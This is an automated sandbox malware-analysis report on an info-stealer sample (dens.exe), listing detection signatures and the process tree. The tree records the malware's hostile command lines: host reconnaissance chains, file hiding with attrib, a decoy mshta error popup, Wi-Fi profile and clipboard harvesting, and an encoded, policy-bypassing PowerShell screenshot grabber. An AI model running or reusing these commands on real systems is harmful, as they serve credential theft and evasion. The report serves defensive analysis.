Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
dens.exe

Overview

General Information

Sample name:dens.exe
Analysis ID:1554825
MD5:258322c37f4f5c632bd6c79520899603
SHA1:f7971d8fef96c59df97a2b31436cc0c1f8921182
SHA256:09b67ccd7d38d2f868eb2a67c73e2e8d45aefe1054522477b259c399527b2c39
Infos:

Detection

Python Stealer, Exela Stealer, Waltuhium Grabber
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
Yara detected Exela Stealer
Yara detected Python Stealer
Yara detected Waltuhium Grabber
AI detected suspicious sample
Bypasses PowerShell execution policy
Detected generic credential text file
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Gathers network related connection and port information
Modifies existing user documents (likely ransomware behavior)
Modifies the windows firewall
Overwrites the password of the administrator account
Performs a network lookup / discovery via ARP
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Sigma detected: MSHTA Suspicious Execution 01
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses attrib.exe to hide files
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
Uses netstat to query active network connections and open ports
Yara detected Generic Python Stealer
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Console CodePage Lookup Via CHCP
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

  • System is w10x64
  • dens.exe (PID: 6248 cmdline: "C:\Users\user\Desktop\dens.exe" MD5: 258322C37F4F5C632BD6C79520899603)
    • dens.exe (PID: 6500 cmdline: "C:\Users\user\Desktop\dens.exe" MD5: 258322C37F4F5C632BD6C79520899603)
      • cmd.exe (PID: 5932 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 980 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 1136 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 3020 cmdline: wmic computersystem get Manufacturer MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 2044 cmdline: C:\Windows\system32\cmd.exe /c "gdb --version" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5344 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 6904 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 732 cmdline: C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 6432 cmdline: wmic path Win32_ComputerSystem get Manufacturer MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 3624 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 4632 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 6392 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 1732 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 1344 cmdline: C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\WaltuhiumUpdateService\Waltuhium.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 6484 cmdline: attrib +h +s "C:\Users\user\AppData\Local\WaltuhiumUpdateService\Waltuhium.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 6560 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • mshta.exe (PID: 2812 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • cmd.exe (PID: 1748 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 4460 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 6544 cmdline: C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 4364 cmdline: cmd.exe /c chcp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • chcp.com (PID: 352 cmdline: chcp MD5: 33395C4732A49065EA72590B14B64F32)
      • cmd.exe (PID: 3624 cmdline: C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 3104 cmdline: cmd.exe /c chcp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • chcp.com (PID: 2692 cmdline: chcp MD5: 33395C4732A49065EA72590B14B64F32)
      • cmd.exe (PID: 4504 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 4284 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 1352 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1900 cmdline: powershell.exe Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 3488 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 6392 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 3652 cmdline: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 2128 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
          • WmiPrvSE.exe (PID: 7172 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • HOSTNAME.EXE (PID: 7380 cmdline: hostname MD5: 33AFAA43B84BDEAB12E02F9DBD2B2EE0)
        • WMIC.exe (PID: 7400 cmdline: wmic logicaldisk get caption,description,providername MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • net.exe (PID: 7456 cmdline: net user MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 7472 cmdline: C:\Windows\system32\net1 user MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • query.exe (PID: 7488 cmdline: query user MD5: 29043BC0B0F99EAFF36CAD35CBEE8D45)
          • quser.exe (PID: 7504 cmdline: "C:\Windows\system32\quser.exe" MD5: 480868AEBA9C04CA04D641D5ED29937B)
        • net.exe (PID: 7536 cmdline: net localgroup MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 7560 cmdline: C:\Windows\system32\net1 localgroup MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • net.exe (PID: 7588 cmdline: net localgroup administrators MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 7608 cmdline: C:\Windows\system32\net1 localgroup administrators MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • net.exe (PID: 7628 cmdline: net user guest MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 7640 cmdline: C:\Windows\system32\net1 user guest MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • net.exe (PID: 7668 cmdline: net user administrator MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 7680 cmdline: C:\Windows\system32\net1 user administrator MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • WMIC.exe (PID: 7700 cmdline: wmic startup get caption,command MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • tasklist.exe (PID: 7760 cmdline: tasklist /svc MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • ipconfig.exe (PID: 7844 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)
        • ROUTE.EXE (PID: 7868 cmdline: route print MD5: 3C97E63423E527BA8381E81CBA00B8CD)
        • ARP.EXE (PID: 7884 cmdline: arp -a MD5: 2AF1B2C042B83437A4BE82B19749FA98)
        • NETSTAT.EXE (PID: 7900 cmdline: netstat -ano MD5: 7FDDD6681EA81CE26E64452336F479E6)
        • sc.exe (PID: 7916 cmdline: sc query type= service state= all MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • netsh.exe (PID: 7940 cmdline: netsh firewall show state MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
        • netsh.exe (PID: 7968 cmdline: netsh firewall show config MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 8040 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8088 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8128 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8184 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
  • svchost.exe (PID: 7256 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000001.00000002.2065840067.000002D9AC8B0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_WaltuhiumGrabberYara detected Waltuhium GrabberJoe Security
